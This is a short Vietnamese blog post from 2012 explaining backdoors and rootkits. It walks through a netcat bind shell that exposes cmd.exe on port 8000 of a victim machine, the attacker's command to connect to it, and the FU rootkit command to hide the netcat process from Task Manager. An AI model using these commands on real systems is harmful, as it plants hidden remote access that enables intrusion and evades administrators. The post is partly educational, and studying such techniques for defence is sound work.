Thứ Bảy, 7 tháng 7, 2012

Tìm hiểu về BackDoor và Rootkit

 Chúng ta đã biết Backdoor và Rootkit là công cụ thông thể hiểu của một hacker. Sau khi hacker tấn công vào hệ thống thì sẽ để lại Backdoor ( cổng sau ) để có thể quay trở lại khai thác thêm thông tin và sử dụng với nhiều mục đích. Kết hợp với rootkit để ẩn nấp trong hệ thống tránh sự phát hiện. Ở đây phần 1 tôi giới thiệu công cụ làm backdoor rất phổ biến là netcat đây là một công cụ rất mạnh và linh hoạt.

1, Netcat có cả 2 version cho Windows và Linux. Chúng ta có thể download tại đây
Sau khi cài đặt đối với hệ điều hành Windows thi netcat chỉ cần duy nhất một files là nc.exe .
Command cho phép netcat lắng nghe ở cổng 8000 .

nc -l -p 8000 -t -e cmd.exe
-l : cho phép netcat ở chế độ lắng nghe
-p : cổng để netcat lắng nghe
-t : cho phép sử dụng kiểu kết nối telnet
-e : chạy chương trình sau khi kết nối

Vậy command ở đây cho phép hacker kết nối vào máy nạn với port 8000 và khởi động chương trình cmd.exe (command line) để thực thi các lệnh tấn công vào hệ thống. Command trên máy hacker:
nc -v 172.16.1.3 8000
ở đây nạn nhân là máy tính 172.16.1.3.
2, Trong quá trình hoạt động của tất cả backdoor luôn nằm trong Processes và Port Listener sẽ khiến cho quản trị hệ thống phát hiện sự bất thường. Vậy làm sao để ẩn dấu sau Processes và Port Listener ??? tới lúc này chúng ra sử dụng kỹ thuật rookit cho phép những processes của backdoor có thể ẩn nấp sâu vào trong hệ thống và khó phát hiện hơn. Với ví dụ ở phần 1 ta sẽ thấy trên hệ thống :
Port Listener

Processes

Ở đây processes nc của tôi có số process id = 2020. Để ấn dấu processes này tôi dùng rootkit Fu. Tải tại đây . Command
fu -ph 2020
Sau khi xong ta dung tasklist để view lại sẽ không còn thấy nc.exe nữa. Đã hoàn toàn được ẩn nấp vào trong hệ thống mà Task Manager cũng như tasklist không phát hiện được. Nhưng đối với “Fu” chỉ che giấu được processes không che giấu được Port Listener. Để làm được điều này ta có thể dùng rootkit “hxdef100r”. Rootkit này cho phép ân dấu cả folder, services, processes, port và registry. Đồng thời cũng tự tạo backdoor luôn. Vì đây là rootkit tương đối nguy hiểm tôi sẽ không đề cập đến cách cấu hình trong bài viết này. Các bạn có thể tham khảo tại đây. Hi vọng sau bài viết này các bạn đã có một cách nhìn tổng quan về Backdoor và Rootkit.

Không có nhận xét nào: